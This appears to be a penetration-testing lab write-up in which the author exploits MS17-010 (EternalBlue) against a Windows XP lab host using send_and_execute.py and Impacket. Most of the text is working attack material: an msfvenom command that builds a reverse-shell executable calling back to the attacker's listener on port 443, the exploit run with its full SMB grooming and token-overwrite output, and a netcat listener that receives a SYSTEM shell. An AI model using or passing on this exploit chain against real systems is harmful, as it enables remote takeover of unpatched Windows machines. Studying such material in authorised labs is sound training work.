Send and Execute

Oh well. After spending several hours Googling and trying out (check out references at end of post) exploits (namely 40279.py, 41987.py, 43980.rb, eternalblue_exploit7.py) I found one that works. Get the send_and_execute.py here. In the exploit script it says:

Tested on: – Windows 2016 x64 – Windows 10 Pro Build 10240 x64 – Windows 2012 R2 x64 – Windows 8.1 x64 – Windows 2008 R2 SP1 x64 – Windows 7 SP1 x64 – Windows 2008 SP1 x64 – Windows 2003 R2 SP2 x64 – Windows XP SP2 x64 – Windows 8.1 x86 – Windows 7 SP1 x86 – Windows 2008 SP1 x86 – Windows 2003 SP2 x86 – Windows XP SP3 x86 – Windows 2000 SP4 x86

Hooray. Now before running that script we need a couple of other things. You need a working version of Impacket. Git clone the repository, then run pip install . in the directory. Incidentally, impacket also allows you to run smbserver.py a script which lets you transfer files from Linux to Windows, a pain given that netcat isn’t a Windows thing.

You also need one more pre-req for the exploit. Get mysmb.py from here, save to the same directory as the exploit. If not when running the exploit you’ll encounter

root@Kali:~/PTP/2.5_Exploitation/Lab 4# python send_and_execute.py 192.168.1.207 ms17-010.exe
Traceback (most recent call last):
  File "send_and_execute.py", line 3, in 
    from mysmb import MYSMB
ImportError: No module named mysmb

Note the ms17-010.exe is the payload which we generate with msfvenom:

root@Kali:~/PTP/2.5_Exploitation/Lab 4# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: ms17-010.exe

With the above, I specified the reverse listener at TCP 443, x86 architecture, Windows platform. Ok time to fire the exploit, after we set up the listener.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# python send_and_execute.py 192.168.1.207 ms17-010.exe
Trying to connect to 192.168.1.207:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x89ee6a88
SESSION: 0xe24add20
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1efcf10
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1efcfb0
overwriting token UserAndGroups
Sending file EF6I56.exe...
Opening SVCManager on 192.168.1.207.....
Creating service XQBG.....
Starting service XQBG.....
The NETBIOS connection with the remote host timed out.
Removing service XQBG.....
ServiceExec Error on: 192.168.1.207
nca_s_proto_error
Done

If successful we get a shell at our listener:

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.73] from (UNKNOWN) [192.168.1.207] 1129
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.